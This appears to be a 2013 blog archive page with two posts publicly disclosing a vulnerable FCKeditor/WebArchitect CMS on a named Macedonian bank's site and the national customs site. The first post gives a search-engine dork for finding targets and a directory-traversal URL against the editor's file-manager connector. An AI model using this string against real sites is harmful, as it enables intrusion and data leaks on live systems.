Month: July 2013

Time to alert “Sparkasse Bank Macedonia” before someone hack them.

Time to alert “Sparkasse Bank Macedonia” before someone hack them..

Again the same vulnerable CMS in one of the EUROPE’S famous bank in Macedonia. I published the FCKEDITOR hack before one and a half years a go. And like I see that there is no any positive wish to fix this RISK that is coming with the FCKEDITOR. Unfortunately a famous bank is also using this EDITOR for their web site  SPARKASSE.COM.MK of Republic of Macedonia which have the exploitable version of FCKEDITOR.

The POC the proof of concept is very simple:

 

site:MK inurl:WEBARCHITECT   and you will see the address http://www.sparkasse.com.mk/

and the second step is just to paste the code:

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=/../&Connector=connectors/aspx/connector.aspx

This will activate the Directory Traversal Attack

http://en.wikipedia.org/wiki/Directory_traversal_attack

Continue reading “Time to alert “Sparkasse Bank Macedonia” before someone hack them.”

0

Simple hack into web server of CUSTOMS of Republic of MACEDONIA

Dear my lovely Macedonia,

Now I’am far away from my hometown Gostivar and my country Macedonia, and trying to help to my  country in the IT security is still my priority, also how we can increase the Security Awareness is still my main concern. I published the FCKEDITOR hack before one and a half years a go. And like I see that there is no any positive wish to fix this RISK that is coming with the WEB ARCHITECT CMS platform. Unfortunately a lot-of Government institutions are using this platform for their web servers. One of them is CUSTOMS.GOV.MK of Republic of Macedonia which have the exploitable version of WEBARCHITECT CMS which have the working exploit of FCKEDITOR. So I hope this will raise some positive alarm to the IT TEAM of the CUSTOMS and fix this hole before some “ATTACKERS” make some defacement of the CUSTOMS.GOV.MK web server and even to leak some confidential data.

Continue reading “Simple hack into web server of CUSTOMS of Republic of MACEDONIA”

0

Blog at WordPress.com.

Up ↑